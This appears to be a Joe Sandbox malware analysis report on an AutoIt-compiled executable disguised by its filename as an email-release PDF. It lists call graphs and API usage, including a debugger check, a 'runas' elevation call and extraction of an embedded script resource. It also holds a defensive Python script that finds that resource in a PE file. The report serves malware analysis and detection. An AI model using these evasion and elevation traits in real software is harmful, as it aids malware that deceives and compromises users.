102954->102953 102955 77dc87 WriteFile 102954->102955 102955->102918 102955->102954 102956->102861 102957->102879 102958->102869 102959->102880 102960->102878 102961->102879 102962->102869 102963->102874 102964->102879 102988 77d4c3 102965->102988 102967 780b41 103001 77d43d 59 API calls 2 library calls 102967->103001 102969 780aeb 102969->102967 102970 77d4c3 __chsize_nolock 58 API calls 102969->102970 102979 780b1f 102969->102979 102974 780b16 102970->102974 102971 77d4c3 __chsize_nolock 58 API calls 102975 780b2b CloseHandle 102971->102975 102972 780b6b 102972->102851 102973 780b49 102973->102972 103002 778b07 58 API calls 3 library calls 102973->103002 102977 77d4c3 __chsize_nolock 58 API calls 102974->102977 102975->102967 102978 780b37 GetLastError 102975->102978 102977->102979 102978->102967 102979->102967 102979->102971 102980->102834 102981->102849 102982->102838 102983->102851 102984->102849 102985->102838 102986->102844 102987->102849 102989 77d4e3 102988->102989 102990 77d4ce 102988->102990 102993 778af4 __chsize_nolock 58 API calls 102989->102993 102995 77d508 102989->102995 102991 778af4 __chsize_nolock 58 API calls 102990->102991 102992 77d4d3 102991->102992 102994 778b28 __cftoe_l 58 API calls 102992->102994 102996 77d512 102993->102996 102997 77d4db 102994->102997 102995->102969 102998 778b28 __cftoe_l 58 API calls 102996->102998 102997->102969 102999 77d51a 102998->102999 103000 778db6 __cftoe_l 9 API calls 102999->103000 103000->102997 103001->102973 103002->102972 103065 781940 103003->103065 103006 75477c 103008 757bcc 59 API calls 103006->103008 103007 754799 103071 757d8c 103007->103071 103010 754788 103008->103010 103067 757726 103010->103067 103013 770791 103014 77079e __ftell_nolock 103013->103014 103015 77079f GetLongPathNameW 103014->103015 103016 757bcc 59 API calls 103015->103016 103017 7572bd 103016->103017 103018 75700b 103017->103018 103019 757667 59 API calls 103018->103019 103020 75701d 103019->103020 103021 754750 60 API calls 
103020->103021 103022 757028 103021->103022 103023 757033 103022->103023 103027 78e885 103022->103027 103024 753f74 59 API calls 103023->103024 103026 75703f 103024->103026 103079 7534c2 103026->103079 103029 78e89f 103027->103029 103085 757908 61 API calls 103027->103085 103030 757052 Mailbox 103030->101891 103032 754ddd 136 API calls 103031->103032 103033 75688f 103032->103033 103034 78e031 103033->103034 103036 754ddd 136 API calls 103033->103036 103035 7b955b 122 API calls 103034->103035 103038 78e046 103035->103038 103037 7568a3 103036->103037 103037->103034 103039 7568ab 103037->103039 103040 78e04a 103038->103040 103041 78e067 103038->103041 103042 7568b7 103039->103042 103043 78e052 103039->103043 103044 754e4a 84 API calls 103040->103044 103045 770db6 Mailbox 59 API calls 103041->103045 103086 756a8c 103042->103086 103193 7b42f8 90 API calls _wprintf 103043->103193 103044->103043 103056 78e0ac Mailbox 103045->103056 103049 78e060 103049->103041 103050 78e260 103051 772d55 _free 58 API calls 103050->103051 103052 78e268 103051->103052 103053 754e4a 84 API calls 103052->103053 103055 78e271 103053->103055 103059 772d55 _free 58 API calls 103055->103059 103060 754e4a 84 API calls 103055->103060 103197 7af7a1 89 API calls 4 library calls 103055->103197 103056->103050 103056->103055 103062 757de1 59 API calls 103056->103062 103179 75750f 103056->103179 103187 75735d 103056->103187 103194 7af73d 59 API calls 2 library calls 103056->103194 103195 7af65e 61 API calls 2 library calls 103056->103195 103196 7b737f 59 API calls Mailbox 103056->103196 103059->103055 103060->103055 103062->103056 103066 75475d GetFullPathNameW 103065->103066 103066->103006 103066->103007 103068 757734 103067->103068 103075 757d2c 103068->103075 103070 754794 103070->103013 103072 757da6 103071->103072 103073 757d99 103071->103073 103074 770db6 Mailbox 59 API calls 103072->103074 103073->103010 103074->103073 103076 757d3a 103075->103076 103078 757d43 _memmove 103075->103078 103077 
757e4f 59 API calls 103076->103077 103076->103078 103077->103078 103078->103070 103080 7534d4 103079->103080 103084 7534f3 _memmove 103079->103084 103082 770db6 Mailbox 59 API calls 103080->103082 103081 770db6 Mailbox 59 API calls 103083 75350a 103081->103083 103082->103084 103083->103030 103084->103081 103085->103027 103087 756ab5 103086->103087 103088 78e41e 103086->103088 103203 7557a6 60 API calls Mailbox 103087->103203 103270 7af7a1 89 API calls 4 library calls 103088->103270 103091 756ad7 103204 7557f6 67 API calls 103091->103204 103092 78e431 103271 7af7a1 89 API calls 4 library calls 103092->103271 103094 756aec 103094->103092 103095 756af4 103094->103095 103097 757667 59 API calls 103095->103097 103099 756b00 103097->103099 103098 78e44d 103127 756b61 103098->103127 103205 770957 60 API calls __ftell_nolock 103099->103205 103101 78e460 103104 755c6f CloseHandle 103101->103104 103102 756b6f 103105 757667 59 API calls 103102->103105 103103 756b0c 103106 757667 59 API calls 103103->103106 103107 78e46c 103104->103107 103108 756b78 103105->103108 103109 756b18 103106->103109 103110 754ddd 136 API calls 103107->103110 103111 757667 59 API calls 103108->103111 103112 754750 60 API calls 103109->103112 103114 78e488 103110->103114 103115 756b81 103111->103115 103113 756b26 103112->103113 103206 755850 ReadFile SetFilePointerEx 103113->103206 103117 78e4b1 103114->103117 103120 7b955b 122 API calls 103114->103120 103208 75459b 103115->103208 103272 7af7a1 89 API calls 4 library calls 103117->103272 103119 756b52 103207 755aee SetFilePointerEx SetFilePointerEx 103119->103207 103124 78e4a4 103120->103124 103121 756b98 103125 757b2e 59 API calls 103121->103125 103128 78e4ac 103124->103128 103129 78e4cd 103124->103129 103130 756ba9 SetCurrentDirectoryW 103125->103130 103126 78e4c8 103157 756d0c Mailbox 103126->103157 103127->103101 103127->103102 103132 754e4a 84 API calls 103128->103132 103131 754e4a 84 API calls 103129->103131 103135 756bbc Mailbox 103130->103135 
103133 78e4d2 103131->103133 103132->103117 103134 770db6 Mailbox 59 API calls 103133->103134 103141 78e506 103134->103141 103137 770db6 Mailbox 59 API calls 103135->103137 103139 756bcf 103137->103139 103138 753bbb 103138->101756 103138->101780 103140 75522e 59 API calls 103139->103140 103168 756bda Mailbox __wsetenvp 103140->103168 103142 75750f 59 API calls 103141->103142 103174 78e54f Mailbox 103142->103174 103143 756ce7 103266 755c6f 103143->103266 103146 78e740 103277 7b72df 59 API calls Mailbox 103146->103277 103147 756cf3 SetCurrentDirectoryW 103147->103157 103150 78e762 103278 7cfbce 59 API calls 2 library calls 103150->103278 103153 78e76f 103154 772d55 _free 58 API calls 103153->103154 103154->103157 103155 78e7d9 103281 7af7a1 89 API calls 4 library calls 103155->103281 103198 7557d4 103157->103198 103159 75750f 59 API calls 103159->103174 103160 78e7f2 103160->103143 103162 78e7d1 103280 7af5f7 59 API calls 4 library calls 103162->103280 103165 757de1 59 API calls 103165->103168 103168->103143 103168->103155 103168->103162 103168->103165 103259 75586d 67 API calls _wcscpy 103168->103259 103260 756f5d GetStringTypeW 103168->103260 103261 756ecc 60 API calls __wcsnicmp 103168->103261 103262 756faa GetStringTypeW __wsetenvp 103168->103262 103263 77363d GetStringTypeW _iswctype 103168->103263 103264 7568dc 165 API calls 3 library calls 103168->103264 103265 757213 59 API calls Mailbox 103168->103265 103169 757de1 59 API calls 103169->103174 103173 78e792 103279 7af7a1 89 API calls 4 library calls 103173->103279 103174->103146 103174->103159 103174->103169 103174->103173 103273 7af73d 59 API calls 2 library calls 103174->103273 103274 7af65e 61 API calls 2 library calls 103174->103274 103275 7b737f 59 API calls Mailbox 103174->103275 103276 757213 59 API calls Mailbox 103174->103276 103176 78e7ab 103177 772d55 _free 58 API calls 103176->103177 103178 78e7be 103177->103178 103178->103157 103180 7575af 103179->103180 103186 757522 _memmove 103179->103186 

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00753B68
• IsDebuggerPresent.KERNEL32 ref: 00753B7A
• GetFullPathNameW.KERNEL32(00007FFF,?,?,,008152E0,?,?), ref: 00753BEB
  • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
  • Part of subcall function 0076092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00753C14,,?,?,?), ref: 0076096E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00753C6F
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00807770,00000010), ref: 0078D281
• SetCurrentDirectoryW.KERNEL32(?,,?,?,?), ref: 0078D2B9
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00804260,,?,?,?), ref: 0078D33F
• ShellExecuteW.SHELL32(00000000,?,?), ref: 0078D346
  • Part of subcall function 00753A46: GetSysColorBrush.USER32(0000000F), ref: 00753A50
  • Part of subcall function 00753A46: LoadCursorW.USER32(00000000,00007F00), ref: 00753A5F
  • Part of subcall function 00753A46: LoadIconW.USER32(00000063), ref: 00753A76
  • Part of subcall function 00753A46: LoadIconW.USER32(000000A4), ref: 00753A88
  • Part of subcall function 00753A46: LoadIconW.USER32(000000A2), ref: 00753A9A
  • Part of subcall function 00753A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00753AC0
  • Part of subcall function 00753A46: RegisterClassExW.USER32(?), ref: 00753B16
  • Part of subcall function 007539D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00753A03
  • Part of subcall function 007539D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00753A24
  • Part of subcall function 007539D5: ShowWindow.USER32(00000000,?,?), ref: 00753A38
  • Part of subcall function 007539D5: ShowWindow.USER32(00000000,?,?), ref: 00753A41
  • Part of subcall function 0075434A: _memset.LIBCMT ref: 00754370
  • Part of subcall function 0075434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00754415
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: This is a third-party compiled AutoIt script.$runas$%~$
• API String ID: 529118366-2481735577
• Opcode ID: 8e8372ef758587441ff450a6152ee0568e5638199dd4b91dc3ee56c776a7970c
• Instruction ID: f47e2c26d842580c4bb7e49ad80595d641971a7c68ef8ee02a7a0fb0a966b05b
• Opcode Fuzzy Hash: 8e8372ef758587441ff450a6152ee0568e5638199dd4b91dc3ee56c776a7970c
• Instruction Fuzzy Hash: 1F51D571D08248EADB11EBB4EC09DED7B7DFF85752F008065F852A21A1DAFC5A49CB21

Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetVersionExW.KERNEL32(?), ref: 007549CD
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          • GetCurrentProcess.KERNEL32(?,007DFAEC,00000000,00000000,?), ref: 00754A9A
                                                                                                          • IsWow64Process.KERNEL32(00000000), ref: 00754AA1
                                                                                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00754AE7
                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00754AF2
                                                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00754B23
                                                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00754B2F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1986165174-0
                                                                                                          • Opcode ID: 993f1d5d96818aa055d88cdca0ea02b6c152493e94f2942c98bbb3ea4f546b33
                                                                                                          • Instruction ID: ae85f07cc8fd49c967188070865a76412e0b3df1da3004ab9484de79c06baa47
                                                                                                          • Opcode Fuzzy Hash: 993f1d5d96818aa055d88cdca0ea02b6c152493e94f2942c98bbb3ea4f546b33
                                                                                                          • Instruction Fuzzy Hash: 2791063198A7C0DEC731DB7898541EAFFF5AF2A305B04896ED4C783A41D268A94CC75D

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph for function 00754E89 (basic blocks 754e89-754ec6 and 78d933-78d98b): 754e89 CreateStreamOnHGlobal -> 754ea3 FindResourceExW -> 78d933 LoadResource -> 78d948 SizeofResource -> 78d95c LockResource -> 78d96d; every failed call falls through to 754ec0 -> 754ec1 (rendered graph; full node/edge list omitted)
                                                                                                          APIs
                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00754D8E,?,?,00000000,00000000), ref: 00754E99
                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00754D8E,?,?,00000000,00000000), ref: 00754EB0
                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,00754D8E,?,?,00000000,00000000,?,?,?,?,?,?,00754E2F), ref: 0078D937
                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00754D8E,?,?,00000000,00000000,?,?,?,?,?,?,00754E2F), ref: 0078D94C
                                                                                                          • LockResource.KERNEL32(00754D8E,?,?,00754D8E,?,?,00000000,00000000,?,?,?,?,?,?,00754E2F,00000000), ref: 0078D95F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                          • String ID: SCRIPT
                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                          • Opcode ID: 8c940dc497a1adb850cdcf0f83a69db0322c0d9198bd4447b9647b75b33e4e65
                                                                                                          • Instruction ID: 98ae7aa3020d190504f46e1b52f2bf122a09cdf90208da68d879621ad2405606
                                                                                                          • Opcode Fuzzy Hash: 8c940dc497a1adb850cdcf0f83a69db0322c0d9198bd4447b9647b75b33e4e65
                                                                                                          • Instruction Fuzzy Hash: D7115E75240700BFD7218B65EC49F6B7BBAFBC5B15F14826DF806C6250DBA5EC448A60
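                                                                                                          The sequence in the function above (CreateStreamOnHGlobal, then FindResourceExW with lpType 0000000A, lpName "SCRIPT", language 0, then LoadResource, SizeofResource, LockResource) is the sample reading a resource of type RT_RCDATA (10) named SCRIPT out of its own image, which is where a compiled AutoIt executable stores its script and is consistent with the "Binary is likely a compiled AutoIt script file" signature. The following Python is an added triage check, not code from this report or from AutoIt: it walks a PE resource directory the same way (type, then name, then language) and returns that resource's bytes. The build_rsrc and build_test_pe helpers construct a minimal stand-in image so the check runs offline; their payload and layout are constructed test data, not material from the sample.

```python
import struct

RT_RCDATA = 0x0A   # the 0000000A lpType argument of FindResourceExW in the trace above


def _read_name(rsrc, field):
    """Name field of a directory entry: an ID, or (high bit set) offset of a UTF-16LE string."""
    if field & 0x80000000:
        off = field & 0x7FFFFFFF
        (length,) = struct.unpack_from("<H", rsrc, off)
        return rsrc[off + 2:off + 2 + 2 * length].decode("utf-16-le")
    return field


def _entries(rsrc, dir_off):
    """Yield (name_or_id, offset_field) for every entry of one IMAGE_RESOURCE_DIRECTORY."""
    n_named, n_id = struct.unpack_from("<HH", rsrc, dir_off + 12)
    for i in range(n_named + n_id):
        name, off = struct.unpack_from("<II", rsrc, dir_off + 16 + 8 * i)
        yield _read_name(rsrc, name), off


def find_resource(rsrc, rsrc_rva, type_id, name):
    """Walk type -> name -> language as FindResourceEx does; return the data bytes or None.

    rsrc is the raw resource directory and rsrc_rva its virtual address, needed because
    the leaf IMAGE_RESOURCE_DATA_ENTRY stores the data location as an RVA.
    """
    for t_name, t_off in _entries(rsrc, 0):
        if t_name != type_id or not t_off & 0x80000000:
            continue
        for n_name, n_off in _entries(rsrc, t_off & 0x7FFFFFFF):
            # resource names are matched case-insensitively, like FindResourceEx
            if not isinstance(n_name, str) or n_name.upper() != name.upper():
                continue
            if not n_off & 0x80000000:
                continue
            for _lang, d_off in _entries(rsrc, n_off & 0x7FFFFFFF):
                data_rva, size = struct.unpack_from("<II", rsrc, d_off & 0x7FFFFFFF)
                start = data_rva - rsrc_rva
                return rsrc[start:start + size]
    return None


def autoit_script_resource(image):
    """Bytes of the RT_RCDATA resource named SCRIPT in an on-disk PE image, or None."""
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (n_sections,) = struct.unpack_from("<H", image, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", image, e_lfanew + 20)
    opt = e_lfanew + 24
    (magic,) = struct.unpack_from("<H", image, opt)
    data_dir = opt + (0x60 if magic == 0x10B else 0x70)           # PE32 vs PE32+
    (rsrc_rva,) = struct.unpack_from("<I", image, data_dir + 8 * 2)  # data directory entry 2: RESOURCE
    sec = opt + opt_size
    for i in range(n_sections):
        vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", image, sec + 40 * i + 8)
        if rsrc_rva and vaddr <= rsrc_rva < vaddr + max(vsize, raw_size):
            rsrc = image[raw_ptr + (rsrc_rva - vaddr):raw_ptr + raw_size]
            return find_resource(rsrc, rsrc_rva, RT_RCDATA, "SCRIPT")
    return None


def build_rsrc(type_id, name, payload, rsrc_rva=0x1000):
    """Constructed resource directory: one type, one named entry, one language (0)."""
    enc = name.encode("utf-16-le")
    name_off = 88                                   # three 24-byte directories + 16-byte data entry
    data_off = (name_off + 2 + len(enc) + 3) & ~3   # payload, 4-byte aligned, after the name string

    def directory(n_named, n_id, entry_name, entry_off):
        return struct.pack("<IIHHHH", 0, 0, 0, 0, n_named, n_id) + struct.pack("<II", entry_name, entry_off)

    blob = (directory(0, 1, type_id, 0x80000000 | 24)
            + directory(1, 0, 0x80000000 | name_off, 0x80000000 | 48)
            + directory(0, 1, 0, 72)
            + struct.pack("<IIII", rsrc_rva + data_off, len(payload), 0, 0)
            + struct.pack("<H", len(name)) + enc)
    return blob + b"\0" * (data_off - len(blob)) + payload


def build_test_pe(rsrc_blob, rsrc_rva=0x1000):
    """Constructed minimal PE32 (not a real sample) whose only section holds the resource data."""
    raw_ptr = 0x200
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 0x5C, 16)                       # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 0x60 + 8 * 2, rsrc_rva, len(rsrc_blob))
    section = b".rsrc\0\0\0" + struct.pack("<IIII", len(rsrc_blob), rsrc_rva, len(rsrc_blob), raw_ptr) + b"\0" * 16
    headers = dos + coff + bytes(opt) + section
    return headers + b"\0" * (raw_ptr - len(headers)) + rsrc_blob
```

                                                                                                          Run autoit_script_resource on the bytes of a suspect file; a non-None result means the file carries the RT_RCDATA/SCRIPT resource this function looks up, and the returned bytes are what LockResource hands back to the runtime. The walker deliberately ignores the language level (it takes the first language entry), because the trace passes language 0 and the lookup here is a presence check, not a localisation lookup.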
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpper
                                                                                                          • String ID: %~
                                                                                                          • API String ID: 3964851224-3145668672
                                                                                                          • Opcode ID: 0b65f46bee12efa2b87864da11568cd98d996a23b704e8aac913ef494a096d24
                                                                                                          • Instruction ID: 2c1efe3c65ddc199f0b5ab956cd21ac19bcd055d7297f667a524422cea61ff52
                                                                                                          • Opcode Fuzzy Hash: 0b65f46bee12efa2b87864da11568cd98d996a23b704e8aac913ef494a096d24
                                                                                                          • Instruction Fuzzy Hash: 9A924570608341DFDB24DF24C484B6BB7E1BF85304F14896DE98A9B262D779EC49CB92
                                                                                                          APIs
                                                                                                          • IsThemeActive.UXTHEME ref: 00754834
                                                                                                            • Part of subcall function 0077336C: __lock.LIBCMT ref: 00773372
                                                                                                            • Part of subcall function 0077336C: DecodePointer.KERNEL32(00000001,?,00754849,007A7C74), ref: 0077337E
                                                                                                            • Part of subcall function 0077336C: EncodePointer.KERNEL32(?,?,00754849,007A7C74), ref: 00773389
                                                                                                            • Part of subcall function 007548FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00754915
                                                                                                            • Part of subcall function 007548FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0075492A
                                                                                                            • Part of subcall function 00753B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00753B68
                                                                                                            • Part of subcall function 00753B3A: IsDebuggerPresent.KERNEL32 ref: 00753B7A
                                                                                                            • Part of subcall function 00753B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,,008152E0,?,?), ref: 00753BEB
                                                                                                            • Part of subcall function 00753B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00753C6F
                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00754874
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                          • String ID: Pm
                                                                                                          • API String ID: 1438897964-1129250259
                                                                                                          • Opcode ID: 81eb190ccfc3e2d555e36cdc4d53f67cb120e9596f44cfe89b943f6eeaa3fe9f
                                                                                                          • Instruction ID: f024c656985d30b36c6ad46a0a2cc864dafdaad3c7363f8fbd49120889922ed7
                                                                                                          • Opcode Fuzzy Hash: 81eb190ccfc3e2d555e36cdc4d53f67cb120e9596f44cfe89b943f6eeaa3fe9f
                                                                                                          • Instruction Fuzzy Hash: 52119071904301DBC700DF68EC0998ABBE8FF95750F10851EF48587271DBB4A549CB95
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(?,0078E398), ref: 007B446A
                                                                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 007B447B
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007B448B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 48322524-0
                                                                                                          • Opcode ID: 30e98b3d14e12b28e9cb9d5a9e41e5e09ad428f7b9770993f1acea55547e2f8e
                                                                                                          • Instruction ID: 411dbf5925aa2e679e2abb5e3f050c08e6b1e31423803b231e3ec25069df7da1
                                                                                                          • Opcode Fuzzy Hash: 30e98b3d14e12b28e9cb9d5a9e41e5e09ad428f7b9770993f1acea55547e2f8e
                                                                                                          • Instruction Fuzzy Hash: E9E020334115406B42106B38EC0D9ED776CAF05335F104717F836D10D0E77C6D1095D9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HY$Variable must be of type 'Object'.
                                                                                                          • API String ID: 0-2698997645
                                                                                                          • Opcode ID: b8571357abff8900a864d377df01803780e78343bab08063f7501e4f780f16d3
                                                                                                          • Instruction ID: 9e949e8399a839dbc40cd786b4638bf790c44c986d40256c77ec46899142c121
                                                                                                          • Opcode Fuzzy Hash: b8571357abff8900a864d377df01803780e78343bab08063f7501e4f780f16d3
                                                                                                          • Instruction Fuzzy Hash: 80A28C75A00205CFCB28CF54C484AEAB7B2FF58311F248059ED55AB351D7B9EE4ACB91
                                                                                                          APIs
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00760A5B
                                                                                                          • timeGetTime.WINMM ref: 00760D16
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00760E53
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00760E61
                                                                                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00760EFA
                                                                                                          • DestroyWindow.USER32 ref: 00760F06
                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00760F20
                                                                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00794E83
                                                                                                          • TranslateMessage.USER32(?), ref: 00795C60
                                                                                                          • DispatchMessageW.USER32(?), ref: 00795C6E
                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00795C82
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
